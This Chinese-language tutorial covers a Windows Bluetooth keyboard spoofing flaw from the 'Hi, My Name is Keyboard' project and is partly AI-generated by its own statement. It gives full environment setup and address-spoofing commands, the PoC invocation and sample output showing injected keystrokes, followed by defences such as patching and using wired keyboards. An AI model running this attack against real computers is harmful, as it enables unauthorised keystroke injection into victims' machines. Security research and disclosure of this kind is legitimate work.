Windows蓝牙键盘漏洞深度剖析Hi, My Name is Keyboard实战教程【免费下载链接】hi_my_name_is_keyboard项目地址: https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboardHi, My Name is Keyboard项目是一个专注于蓝牙键盘安全研究的开源项目包含多个操作系统的蓝牙键盘漏洞利用PoC脚本。本文将深入解析Windows系统中的蓝牙键盘漏洞通过实战演示帮助你了解漏洞原理、攻击过程及防御方法。漏洞原理Windows蓝牙键盘安全隐患当Windows电脑与蓝牙键盘配对后若原键盘关闭或超出连接范围攻击者可通过物理接近的方式利用Ubuntu电脑和博通蓝牙适配器伪造目标键盘地址并连接到Windows的L2CAP 17端口。此时受害者会看到“Add a device”通知即便点击取消或关闭配对对话框攻击者仍能完成配对并注入任意按键这就是Windows蓝牙键盘漏洞的核心风险。图Linux系统蓝牙设置界面展示了设备配对状态漏洞利用条件与环境准备漏洞利用条件Windows电脑已与蓝牙键盘配对且原键盘处于关闭或超出范围状态攻击者需在物理上接近目标设备使用博通蓝牙适配器的Ubuntu 22.04电脑环境准备步骤首先克隆项目仓库git clone https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard然后安装依赖sudo apt-get update sudo apt-get -y upgrade sudo apt install -y bluez-tools bluez-hcidump git python3-pip python3-setuptools libbluetooth-dev sudo sed -i s|ExecStart/usr/lib/bluetooth/bluetoothd|ExecStart/usr/lib/bluetooth/bluetoothd --compat|g /lib/systemd/system/bluetooth.service sudo systemctl daemon-reload sudo systemctl restart bluetooth git clone https://github.com/pybluez/pybluez.git cd pybluez sudo python3 setup.py install python3 -m pip install pydbus cd ~ git clone https://github.com/bluez/bluez.git cd bluez gcc -o bdaddr tools/bdaddr.c src/oui.c -lbluetooth -I. sudo cp bdaddr /usr/local/bin/实战演示Windows蓝牙键盘攻击过程攻击步骤将蓝牙键盘与目标Windows电脑配对然后关闭键盘在Ubuntu电脑上运行PoC脚本./windows-poc.py -i Interface -k Keyboard-Address -c Windows-Address当Windows电脑出现通知时点击它关闭配对请求对话框或点击取消或批准成功后Ubuntu机器将连接到Windows并注入5秒的tab按键示例输出$ ./windows-poc.py -i hci0 -k 3C:A6:F6:EC:5B:ED -c 04:33:C2:19:CD:3B Manufacturer: Broadcom Corporation (15) Device address: 12:34:56:78:9A:BC New BD address: 3C:A6:F6:EC:5B:ED Address changed - Reset device now HID keyboard service registered NoInputNoOutput pairing-agent running connecting to PSM 17 successfully connected to PSM 17 (HID Control) connecting to PSM 19 successfully connected to PSM 19 (HID Interrupt) injecting 5 seconds of tab keypresses图macOS桌面界面展示了攻击可能发生的环境漏洞防御保护你的Windows设备临时防御措施保持蓝牙键盘处于开启状态减少被攻击窗口及时关闭不使用的蓝牙功能谨慎对待蓝牙配对请求遇到不明配对请求时选择拒绝长期解决方案安装系统安全更新微软已针对此漏洞发布相关补丁使用USB有线键盘替代蓝牙键盘启用Windows防火墙和安全软件增强系统防护能力漏洞技术细节与PoC分析LMP竞争条件在链接建立过程中存在竞争条件Ubuntu和Windows电脑会同时尝试启用链接加密。配对通常在1-2秒内完成但可能需要长达15-30秒。通过对攻击者内核中的hci_event.c进行小补丁可以缓解此竞争条件。PoC脚本解析PoC脚本windows-poc.py实现了完整的攻击流程包括地址伪造、服务注册、配对请求处理和按键注入等功能。脚本通过伪造蓝牙键盘地址利用Windows蓝牙配对机制的漏洞实现了未经授权的按键注入。总结与展望Windows蓝牙键盘漏洞展示了物理接近攻击的潜在风险。通过本文的解析和实战演示你已经了解了漏洞的原理、利用方法和防御措施。建议普通用户保持系统更新安全从业者可以通过windows-report.md深入研究漏洞细节共同提升蓝牙设备的安全性。随着蓝牙技术的广泛应用设备安全问题日益凸显。Hi, My Name is Keyboard项目为安全研究人员提供了宝贵的测试工具有助于推动蓝牙安全技术的发展和完善。【免费下载链接】hi_my_name_is_keyboard项目地址: https://gitcode.com/gh_mirrors/hi/hi_my_name_is_keyboard创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考